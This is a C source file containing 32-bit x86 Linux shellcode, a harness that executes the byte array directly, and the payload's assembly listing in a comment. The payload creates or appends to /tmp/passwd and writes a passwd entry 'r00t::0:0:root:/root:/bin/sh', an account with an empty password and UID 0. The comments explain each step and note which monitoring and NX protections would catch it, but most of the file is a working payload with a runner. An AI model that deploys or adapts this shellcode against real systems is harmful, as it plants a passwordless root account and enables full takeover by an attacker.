
/*
 * Position-independent 32-bit x86 payload; its assembly source is the listing
 * kept in the comment at the end of this file.  It uses int $0x80 with
 * syscall numbers 5, 4 and 1 (open, write and exit on i386 Linux, which is
 * presumably the intended target).
 *
 * Behaviour, as read from that listing:
 *   - jmp/call/pop leaves the address of the embedded string in %esi;
 *   - the 'A' at offset 0x0b of the string is turned into a NUL, so the
 *     string starts with the path "/tmp/passwd";
 *   - open(path, flags 0x0c42, mode 0644);
 *   - write(fd, string + 0x0c, 0x1c), i.e. the passwd-format record that
 *     begins "r00t::0:0:root:/root:/bin/sh";
 *   - exit.
 *
 * The record has an empty password field and UID/GID 0.  Unexpected entries
 * of that shape in an account database are what file-integrity monitoring
 * and account audits should alert on.
 *
 * The array contains no 0x00 byte, so strlen() in main() reports its full
 * length.
 */
unsigned char shellcode[] = 
"\xeb\x2f\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\x8d\x1e\x83\x6e\x0b\x41"
"\x66\xba\xa4\x01\x66\xb9\x42\x0c\xb0\x05\xcd\x80\x8d\x4e\x0c\x89\xc3"
"\x31\xc0\xb0\x04\x89\xc2\xb2\x1c\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xcc"
"\xff\xff\xff\x2f\x74\x6d\x70\x2f\x70\x61\x73\x73\x77\x64\x41\x72\x30"
"\x30\x74\x3a\x3a\x30\x3a\x30\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a";

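/*
 * Test harness: prints the length of the byte array, then transfers control
 * to it.
 *
 * printf() and strlen() need <stdio.h> and <string.h>; no #include is visible
 * in this listing, so the declarations are implicit unless the headers are
 * added at the top of the file.
 *
 * The array lives in initialized data.  Where data pages are mapped
 * non-executable (NX / W^X), the indirect call below is expected to fault
 * instead of running the bytes, which is the mitigation doing its job.
 * Converting an object pointer to a function pointer is also outside ISO C.
 *
 * Returns 0 if the call ever comes back; the listing at the end of the file
 * ends in an exit syscall, so it normally does not.
 */
int main(void) {
    void (*f)(void);

    f = (void (*)(void)) shellcode;

    /* strlen() takes a char pointer and returns size_t: cast the unsigned
     * char array explicitly and print with %zu, since %d with a size_t
     * argument is undefined behaviour. */
    printf("%zu\n", strlen((const char *) shellcode));

    f();
    return 0;
}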
/*
.globl cbegin
.globl cend

cbegin:
	jmp fincode

function:
	pop 	%esi

	xorl	%eax, %eax
	mov		%eax, %ebx
	mov		%eax, %ecx
	mov		%eax, %edx

# fetch the string address and truncate it: the sub below turns the 'A' at offset 0x0b into a NUL, ending the path
	leal	(%esi), %ebx 
	sub		$0x41, 0x0b(%esi)

# dx holds the file mode (0644)
	mov		$0x01a4, %dx
# cx holds the flags (O_CREAT | O_APPEND | O_NONBLOCK | O_RDWR)
	mov		$0x0c42, %cx
# syscall $0x05
	mov 	$0x5, %al 
	int		$0x80

# after the interrupt, %eax holds the file descriptor

	leal	0x0c(%esi), %ecx
	mov		%eax, %ebx
	xorl	%eax, %eax
	mov		$0x4, %al 
	mov		%eax, %edx
	mov		$0x1c, %dl
	int		$0x80

# _exit(0) 

	xorl	%eax, %eax
	inc		%eax
	int		$0x80

fincode:
	call function
	.string "/tmp/passwdAr00t::0:0:root:/root:/bin/sh\n"
cend:
*/
